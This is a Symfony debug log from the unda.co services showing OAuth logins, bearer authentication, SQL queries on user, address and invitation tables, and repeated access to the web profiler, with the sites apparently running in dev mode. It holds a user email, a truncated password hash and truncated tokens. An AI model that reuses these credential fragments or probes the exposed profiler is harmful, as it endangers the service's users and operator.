[2025-12-19 18:23:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 18:28:57] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-19 18:28:57] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-19 18:28:57] doctrine.DEBUG: SELECT u0_.id AS id_0, u0_.uuid AS uuid_1, u0_.status AS status_2, u0_.date_created AS date_created_3, u0_.date_modified AS date_modified_4, u0_.name AS name_5, u0_.last_name AS last_name_6, u0_.email AS email_7, u0_.password AS password_8, u0_.media_path AS media_path_9, u0_.thumb_path AS thumb_path_10, u0_.curp AS curp_11, u0_.phone AS phone_12, u0_.email_verification AS email_verification_13, u0_.phone_verification AS phone_verification_14 FROM user u0_ WHERE (u0_.email = ?) AND (u0_.password = ?) LIMIT 1 ["mobile.apps@sondermut.com","bf87be12e7c044cfc97be37631 [...]"] []
[2025-12-19 18:28:57] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-19 18:28:57] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"f9210a8b75c939133a6c922f6b [...]","3":"2025-12-19 18:58:57","4":"","5":456,"6":"[]"} []
[2025-12-19 18:28:57] doctrine.DEBUG: "COMMIT" [] []
[2025-12-19 18:28:57] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-19 18:28:57] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"63e2cf27b48c10afbebee33c70 [...]","3":"2026-02-17 18:28:57","4":"","5":456,"6":"[]"} []
[2025-12-19 18:28:57] doctrine.DEBUG: "COMMIT" [] []
[2025-12-19 18:28:58] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
[2025-12-19 18:28:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 18:28:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:28:58] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:28:58] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
[2025-12-19 18:28:58] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:28:58] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:28:58] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["93846236-f8da-11ed-be56-02 [...]"] []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [456,1] []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [1] []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [456,1] []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
[2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [456,289] []
[2025-12-19 18:28:58] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-19 18:29:00] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"0e68cb7a-f1fe-4ab5-8725-9966f6367196","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/0e68cb7a-f1fe-4ab5-8725-9966f6367196/invitation/20/0?order=desc","method":"GET"} []
[2025-12-19 18:29:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 18:29:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:00] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:00] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
[2025-12-19 18:29:00] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:00] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:00] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [456,289,1] []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [1] []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [289,1] []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [289,1] []
[2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
[2025-12-19 18:29:00] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-19 18:29:11] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"1","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"0e68cb7a-f1fe-4ab5-8725-9966f6367196","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/0e68cb7a-f1fe-4ab5-8725-9966f6367196/invitation/20/1?order=desc","method":"GET"} []
[2025-12-19 18:29:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 18:29:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
[2025-12-19 18:29:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [456,289,1] []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [1] []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 20 [289,1] []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [289,1] []
[2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
[2025-12-19 18:29:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-19 18:29:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d9f60","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d9f60","method":"GET"} []
[2025-12-19 18:29:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 18:30:06] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"1c67aaac-1433-4e96-a101-5d615007d5fb","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/1c67aaac-1433-4e96-a101-5d615007d5fb/providers","method":"GET"} []
[2025-12-19 18:30:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 18:30:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:30:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:30:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:30:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
[2025-12-19 18:30:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
[2025-12-19 18:30:06] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:30:06] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:30:06] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 18:30:06] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-19 18:30:54] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 18:32:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"45494f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/45494f?panel=swiftmailer","method":"GET"} []
[2025-12-19 18:32:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 18:33:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=logger","method":"GET"} []
[2025-12-19 18:33:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 18:34:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 18:41:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=swiftmailer","method":"GET"} []
[2025-12-19 18:41:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 18:43:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=exception","method":"GET"} []
[2025-12-19 18:43:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 18:45:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 18:46:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 18:46:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f66ec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f66ec6?panel=dump","method":"GET"} []
[2025-12-19 18:46:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 18:46:45] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"2fe6ee","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/2fe6ee","method":"GET"} []
[2025-12-19 18:49:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=cache","method":"GET"} []
[2025-12-19 18:49:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 18:51:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aae23e","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/aae23e?panel=events","method":"GET"} []
[2025-12-19 18:51:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-19 18:59:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
[2025-12-19 19:05:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=time","method":"GET"} []
[2025-12-19 19:05:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 19:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"58f4a5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/58f4a5?panel=validator","method":"GET"} []
[2025-12-19 19:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
